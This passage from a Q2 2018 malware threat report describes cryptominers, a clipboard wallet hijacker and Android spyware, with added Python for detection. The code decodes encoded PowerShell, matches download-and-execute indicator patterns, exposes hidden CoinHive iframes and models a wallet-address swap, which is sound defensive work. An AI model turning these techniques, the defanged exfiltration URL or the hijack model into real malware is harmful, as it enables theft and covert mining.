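    "in_memory_exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "download": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.I),
    "process_kill": re.compile(r"Stop-Process|taskkill", re.I),
}


def decode_encoded_command(cmdline: str):
    """Return the decoded script carried by a -EncodedCommand argument, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_cmdline(cmdline: str) -> dict:
    """Decode any encoded payload and list the indicators seen across both layers."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + "\n" + (decoded or "")
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    # One indicator alone is common in administration scripts; two or more
    # together is the loader pattern worth an alert.
    return {"decoded": decoded, "indicators": hits, "suspicious": len(hits) >= 2}


if __name__ == "__main__":
    report = analyze_cmdline(SAMPLE_CMDLINE)
    print(report["decoded"])
    print(report["indicators"], report["suspicious"])
```

The same check applies to the VBScript-launched PowerShell in the Emotet case in section 2.2. In practice the command line comes from process-creation telemetry such as Sysmon event 1 or Windows security event 4688 with command-line auditing enabled; the decoded script is what tells you which registry value to go and inspect.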
BadShell at work
The malicious code in the registry
This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the financial losses of the company were irreversible.
Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to the cryptominer's ability to elude antivirus software.
Below is another cunning technique that turns an infected machine into a slave of the attacker.
3.2 WinstarNssmMiner, a system killer
Like other cryptominers, WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system totally.
The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.
The malicious code disguised as svchost.exe
Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victims' systems but also their cryptomining competitors.
3.3 CoinMiner kills rivals
CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature will terminate its processes.
CoinMiner kills its rivals as follows.
The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks if a miner is already running by testing for the presence of an "AMDDriver64" process.
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists, named $malwares and $malwares2, holding the names of the processes it is instructed to kill. The lists include other types of cryptominers.
In this way CoinMiner gains sole possession of the victim's computer and uses its resources for mining cryptocurrency.
Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, which made them easier for users to detect. In Q2 these cryptominers learned to hide; CoinHive is the clearest example.
3.4 CoinHive changes its skin
CoinHive is a popular JavaScript cryptominer. If you put its snippet into a web page, every visitor to the site mines coins for you.
As you can see, the CoinHive script is easily detected.
The CoinHive script
After many publications on the subject in the mass media and in cybersecurity reports, users started checking website code for cryptominers. But in the second quarter perpetrators found a way around this obstacle: they now camouflage the CoinHive presence with URL shorteners.
As a result, the malicious code on a web page looks like this:
The obfuscated malicious code on a web page
If we decode the string, we find an iframe.
The iframe loads the URL shortener. Notice that the width and height of the iframe are set to 1 to make it as close to invisible as possible.
Now let's look at the URL https://cnhv.co (the link shortener operated by CoinHive).
And there we find the familiar link to CoinHive.
The link to CoinHive
What is the impact of this trick? In a simple scenario a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she checks the web page code but finds no sign of a cryptominer. So she concludes that something is wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins. The check that still works is to follow every iframe and script source, however small, and to look at what the shortener resolves to, rather than to search the page for the miner's name.
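The following Python script is an added example, not code from the report: it performs the check just described, decoding the obfuscated loader and inspecting the iframe it hides. The host names coinhive.com and cnhv.co come from the report; the atob()/unescape() wrappers it looks for, and the sample page with its placeholder shortener path, are assumptions constructed for the example.

```python
"""Added example (not code from the report): expose a CoinHive loader that is
hidden behind an obfuscated, 1x1 iframe pointing at the cnhv.co shortener."""
import base64
import binascii
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Hosts named in the report: the miner itself and its URL shortener.
MINER_HOSTS = ("coinhive.com", "cnhv.co")

# Two wrappers commonly used to hide injected markup from a text search. The
# report does not reproduce the exact wrapper it saw; these are assumptions.
B64_RE = re.compile(r"""atob\(\s*['"]([A-Za-z0-9+/=]{16,})['"]\s*\)""")
URLENC_RE = re.compile(r"""unescape\(\s*['"]((?:%[0-9A-Fa-f]{2}|[^'"])+)['"]\s*\)""")


def decoded_payloads(html):
    """Return the plaintext of every atob()/unescape() argument found in html."""
    out = []
    for m in B64_RE.finditer(html):
        try:
            out.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            pass  # not really base64, ignore
    for m in URLENC_RE.finditer(html):
        out.append(unquote(m.group(1)))
    return out


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a fragment."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})


def _is_tiny(value):
    """True for width/height values of 0 or 1 (with or without a px suffix)."""
    m = re.fullmatch(r"\s*(\d+)\s*(?:px)?\s*", value.lower())
    return bool(m) and int(m.group(1)) <= 1


def find_hidden_miners(html):
    """Flag iframes that point at a known miner host or are sized to be invisible.

    Decoded payloads are parsed as separate fragments because HTMLParser treats
    the inside of <script> as text, so markup emitted via document.write()
    would otherwise never be seen as tags."""
    findings = []
    for fragment in [html] + decoded_payloads(html):
        collector = IframeCollector()
        collector.feed(fragment)
        for attrs in collector.iframes:
            src = attrs.get("src", "")
            host = (urlparse(src).hostname or "").lower()
            tiny = _is_tiny(attrs.get("width", "")) and _is_tiny(attrs.get("height", ""))
            known = any(host == h or host.endswith("." + h) for h in MINER_HOSTS)
            if known or tiny:
                findings.append({"src": src, "host": host, "tiny": tiny, "known_miner_host": known})
    return findings


# Constructed sample page (the shortener path "/example" is a placeholder, not
# a real short link): the iframe is base64-wrapped, so grepping the raw source
# for "coinhive" or "cnhv" finds nothing.
HIDDEN_IFRAME = '<iframe src="https://cnhv.co/example" width="1" height="1" frameborder="0"></iframe>'
SAMPLE_PAGE = (
    "<html><body><h1>News</h1>"
    '<script>document.write(atob("%s"));</script>'
    "</body></html>" % base64.b64encode(HIDDEN_IFRAME.encode()).decode()
)
CLEAN_PAGE = ('<html><body><iframe src="https://www.youtube.com/embed/x" '
              'width="560" height="315"></iframe></body></html>')

if __name__ == "__main__":
    for finding in find_hidden_miners(SAMPLE_PAGE):
        print(finding)
```

Run against a saved page, the script reports the decoded iframe with its host and whether it was sized to be invisible; a tiny iframe pointing at an unknown host is still reported, because the shortener domain can change while the 1x1 trick stays the same.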
The next piece of malware in the row prefers not to mine cryptocurrency but to steal it on the fly.
3.5 Cryptocurrency clipboard hijacker intercepts transfers
It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour the infected machine's resources but instead steals cryptocurrency outright, redirecting it to the perpetrator.
Cryptocurrency transfers require a wallet address. The address is a long string of mixed letters and digits, so it is almost impossible to remember or type manually. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste step as a weakness they can exploit.
The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it swaps it for the address of a wallet under the attacker's control, so the unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands. The only user-side defense that survives this is to compare the pasted address, at least its first and last characters, with the one that was copied before confirming the transfer.
A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses.
This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used to spread different types of malware, clipboard cryptocurrency hijackers among them.
Here is an example of a clipboard hijacker attack:
A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
An example of a clipboard hijacker attack
Spread of Clipboard Hijacker malware around the world
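As an added example (not the malware's code or the report's), the Python below models the substitution the hijacker performs and the comparison that catches it, using the two addresses quoted above. The address patterns and the single-entry attacker wallet table are assumptions; the report only states that the sample monitors 2,343,286 addresses.

```python
"""Added example (not the malware's code or the report's): how a clipboard
hijacker selects its target, and the comparison that catches the swap."""
import re

# Address shapes worth hijacking. Patterns are assumptions; the report only
# says the sample can monitor 2,343,286 addresses.
ADDRESS_PATTERNS = {
    "btc_legacy": re.compile(r"[13][a-km-zA-HJ-NP-Z1-9]{25,34}"),  # Base58, P2PKH or P2SH
    "btc_bech32": re.compile(r"bc1[ac-hj-np-z02-9]{11,71}"),       # Bech32 charset
    "eth": re.compile(r"0x[0-9a-fA-F]{40}"),
}


def classify(text):
    """Return the address type a clipboard string looks like, or None."""
    s = text.strip()
    for name, rx in ADDRESS_PATTERNS.items():
        if rx.fullmatch(s):
            return name
    return None


def hijack(clipboard, attacker_wallets):
    """Model of the malware's loop body: if the clipboard holds an address of a
    type the attacker has a wallet for, replace it; otherwise leave it alone."""
    kind = classify(clipboard)
    if kind in attacker_wallets and clipboard.strip() != attacker_wallets[kind]:
        return attacker_wallets[kind]
    return clipboard


def paste_is_safe(copied, pasted, edge=4):
    """The user-side check: the pasted address must be the one that was copied.
    Returns (ok, reason). Comparing the first and last `edge` characters is
    what a person can do by eye; software should compare the whole string."""
    c, p = copied.strip(), pasted.strip()
    if c == p:
        return True, "identical"
    if classify(p) is not None and classify(p) != classify(c):
        return False, "address type changed"
    if c[:edge] != p[:edge] or c[-edge:] != p[-edge:]:
        return False, "first/last %d characters differ" % edge
    return False, "middle characters differ"


# The two addresses quoted in the report. One attacker entry stands in for
# the multi-million-address list the real sample carries.
COPIED = "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"
ATTACKER_WALLETS = {"btc_legacy": "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"}

if __name__ == "__main__":
    pasted = hijack(COPIED, ATTACKER_WALLETS)
    print("pasted:", pasted, "safe:", paste_is_safe(COPIED, pasted))
```

The swap preserves the address type, so a pasted string still "looks like" a Bitcoin address; that is why the check compares the pasted value against what was copied rather than validating its format. Wallet software that remembers the last address the user copied can apply the full comparison automatically.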
Although cryptominers have decreased in number, they keep coming back in updated disguises and promise to become a serious new challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege
4.1 Spying, Stealing, Mining
Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers: every smartphone contains a plethora of confidential information about its owner.
If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content: intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.
Today spying is the number one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks in the graph.
The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.
4.1.1 KevDroid
The first is named KevDroid. It is distributed in three versions:
Version-1: Naver Defender
Version-2: Netease Defender
Version-3: PU
Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details (contact id, name, phone numbers and email address of the owner). It grabs SMS messages and the associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and the photos of contacts. After extracting all the data, the malware encrypts it with AES and sends it to the attackers' server at hxxp://cgalim[.]com/admin/hr/pu/pu.php?do=upload.
KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition it collects information about currently running services, installed apps and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity, then sends the video to the attackers' server.
Version-3 of KevDroid takes photos, records calls and creates a list of the files on the device. It also extracts the web history, account and contact details, and device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via the official Google Play store. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly tracked all events on the infected device. Social networks were another dissemination channel for the malware.
Version-1: Dardesh, Google Play Services, Instant Apps
Version-2: Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim device.
4.1.2 Zoo Park
The next member of the spy family, Zoo Park, has four different versions:
Version-1: Telegram Groups انتخاب دھم
Version-2: Postrall Yes For Referendum انتخاب دھم
Version-3: Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4: VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.
The third version is included in spyware named "Spymaster Pro" and can:
Enable and disable the GPS services
Record audio and send it to the Command & Control server
Upload image files
Collect information about the installed applications
Collect browser data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications such as VPN Easy and DroFirewall.
In addition to the abilities of the previous versions, it includes some additional tricks:
Extracts photos, audio and videos
Records the screen
Executes shell commands
Records calls
4.1.3 MikeSpy
Some spyware samples specifically hunt for messenger data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend it delivers a bundle of malicious abilities:
Takes control of the Bluetooth adapter
Extracts account data, contact details and the list of installed apps
Extracts data from the WhatsApp message DB and the related keys
Uploads the collected data to the cybercriminals' server via FTP
4.1.4 Xloader
The next spyware, Xloader, combines spying with a purposeful hunt for banking applications on the device. It uses trust-inspiring cover icons imitating Facebook and Google Chrome.
Version-1 to Version-3: Facebook, Chrome
Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
Extract contact details
Keep Wi-Fi always turned on
Version 2 can execute additional commands:
Send SMS and read outgoing SMS
Enable and disable the Wi-Fi connection
Access a location specified by the attackers
Make recordings
Make calls
4.1.5 Stalker Spy
The next malware in the row is Stalker Spy. As you can see, it is the champion in the number of masks it puts on to deceive users.
App: distribution disguises
FlexiSpy: MBackup
HelloSpy: ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Mobile Spy: 随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to the usual must-have spyware set, Stalker Spy can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.
4.1.6 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot combines spyware that steals information with a banking trojan that connects to the C&C server of the LokiBot Android banker. The second version of Mystery Bot is ransomware that encrypts files on external storage; after encryption the malware deletes the original files. So we can call it a spy with a "007 licence".
Version 1: Adobe Flash Player
Version 2: Flash Player
Disguises of Mystery Bot
Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some of the commands the malware can execute on your device:
Send_SMS: extract SMS content and send it to the C&C server
Send_USSD: send the USSD to the C&C server
Gethistory: monitor browser history
Start_AllApp: gather info about installed applications
Send_call: set the Intent action to call
Forward_call: forward incoming calls
ResForward_call: reset call forwarding
Go_Smsmnd: delete SMS content
Go_GetAlls: get SMS history
Dell_sms: delete SMS content in a conversation
Send_spam: send spam SMS
Start_Inject: call the injectors class
4.1.7 FakeSpy
FakeSpy also has many masks, which you can see in the screenshot:
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects the available information from the infected device and sends it to C&C servers. It also checks for the presence of the following banking applications: aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server:
contacts: get contact details and email id
mute: set action to mute
mms: get MMS content
info: get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber
Version 2: Update Google Market, Flash Player, Tactic, FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
de.postbank.finanzassistent
pl.mbank
aib.ibank.android
The second version can block access to some applications and websites, including Google Chrome, the Google Play store, Gmail and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, operates mostly in Iran. It uses third-party app stores, social networks and messengers for spreading.
Version 1: CloudVPN MyIrancel Mtproto زیـــــبانـــــویس تلگرام ھمھ کاره Proxy دوست یاب Telegram Ton شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on a Telegram hacking channel. Notably, it is sold in three tiers: bronze, silver and gold.
After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it keeps running in the background and starts its spying activity: it steals text messages and audio recordings, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip" option. If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises listed above.
4.1.11 CoinHive
The last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of them improving its mining potential. It is disseminated via the counterfeit apps you see below, but one of the vectors is especially interesting.
Version-1: Netflix Hack, Instagram Hack
Version-2: TSF Launcher
Version-3: Android Service, PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via ... another cryptominer, named CoinMiner.
How is that possible? Imagine a cybercriminal who wants to infect victims with a cryptominer in order to use their resources for cryptocurrency mining. She chooses CoinMiner for the purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too: thief robbing thief.
This story clearly illustrates the state of cybersecurity in Q2: no one can feel totally secure. Even a predator can turn into prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Android-targeted malware in April 2018 (chart)
4.2.2 May 2018
Android-targeted malware in May 2018 (chart)
4.2.3 June 2018
Android-targeted malware in June 2018 (chart)
5 Malware in Q2 2018: The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them over a local area network (LAN) or company intranet.
In Q2 2018 Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory-resident" virus that infects .exe and .scr files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos, which in 2012 led to the arrest of 10 people by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was DarkComet, a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system through a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo's Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (.exe) and HTML files (.html) and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, because their malicious functionality is hidden within seemingly useful or benign programs. Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018 Starter was the most common Trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on the victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
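An added detection example, not from the report: the account-creation behaviour attributed to Starter leaves a pair of Windows Security events on the host, 4720 (a user account was created) followed by 4732 (a member was added to a security-enabled local group) naming the local Administrators group (well-known SID S-1-5-32-544). The Python below correlates the two over a short window. The event records are constructed for the example, with invented account names, SIDs and timestamps; a real pipeline would extract the same fields from the EVTX or from the SIEM.

```python
"""Added example (not code from the report): correlate Windows Security events
4720 and 4732 to catch a newly created account being made a local administrator,
the behaviour the report attributes to the Starter trojan."""
from datetime import datetime

ADMINISTRATORS_SID = "S-1-5-32-544"   # well-known SID of the local Administrators group
ACCOUNT_CREATED = 4720                # "A user account was created"
MEMBER_ADDED_TO_LOCAL_GROUP = 4732    # "A member was added to a security-enabled local group"

# Constructed sample of the fields a log pipeline would extract from the events.
# Names, SIDs and timestamps are invented for the example.
SAMPLE_EVENTS = [
    {"EventID": 4624, "Time": "2018-06-04T09:12:01", "TargetUserName": "alice"},
    {"EventID": ACCOUNT_CREATED, "Time": "2018-06-04T09:12:40",
     "SubjectUserName": "SYSTEM", "TargetUserName": "svc_remote",
     "TargetSid": "S-1-5-21-1-2-3-1105"},
    {"EventID": MEMBER_ADDED_TO_LOCAL_GROUP, "Time": "2018-06-04T09:12:41",
     "SubjectUserName": "SYSTEM", "MemberSid": "S-1-5-21-1-2-3-1105",
     "TargetUserName": "Administrators", "TargetSid": ADMINISTRATORS_SID},
    # A helpdesk-created account that only gets Remote Desktop Users: no alert.
    {"EventID": ACCOUNT_CREATED, "Time": "2018-06-04T10:00:00",
     "SubjectUserName": "helpdesk", "TargetUserName": "bob",
     "TargetSid": "S-1-5-21-1-2-3-1106"},
    {"EventID": MEMBER_ADDED_TO_LOCAL_GROUP, "Time": "2018-06-04T10:00:05",
     "SubjectUserName": "helpdesk", "MemberSid": "S-1-5-21-1-2-3-1106",
     "TargetUserName": "Remote Desktop Users", "TargetSid": "S-1-5-32-555"},
]


def _t(stamp):
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%S")


def find_new_admin_accounts(events, window_seconds=600):
    """Return one alert per account that was created and then added to the
    local Administrators group within window_seconds of its creation."""
    created = {}   # new account SID -> its 4720 event
    alerts = []
    for ev in sorted(events, key=lambda e: _t(e["Time"])):
        if ev["EventID"] == ACCOUNT_CREATED:
            created[ev["TargetSid"]] = ev
        elif (ev["EventID"] == MEMBER_ADDED_TO_LOCAL_GROUP
              and ev.get("TargetSid") == ADMINISTRATORS_SID):
            origin = created.get(ev.get("MemberSid"))
            if origin is None:
                continue   # membership change for a pre-existing account
            delay = (_t(ev["Time"]) - _t(origin["Time"])).total_seconds()
            if delay <= window_seconds:
                alerts.append({
                    "account": origin["TargetUserName"],
                    "sid": origin["TargetSid"],
                    "created_by": origin.get("SubjectUserName"),
                    "elevated_at": ev["Time"],
                    "seconds_after_creation": int(delay),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_new_admin_accounts(SAMPLE_EVENTS):
        print(alert)
```

Keying on SIDs rather than account names avoids being fooled by a trojan that reuses the name of a deleted account, and the SubjectUserName of the 4720 event tells the analyst which process context performed the creation.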
5.2.4 Exploits
Computer exploits comprise software, chunks of data or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
In-the-wild exploit detections can be rare, as the underlying vulnerabilities are typically patched quickly once they are discovered.
In Q2 2018 the majority of the exploits detected by Comodo targeted a favorite hacker target, Adobe Portable Document Format (PDF) files, a format created in the 1990s to present documents independently of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
5.3 Medium Threat Malware
In this section we focus on five malware types that are somewhat rarer and more exotic: Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
5.3.2 Packers
"Packed" malware refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which recreates the original code from the compressed form and then executes the malware. Encryption may also be used to conceal the malware from security software as another means of obfuscating the attack.
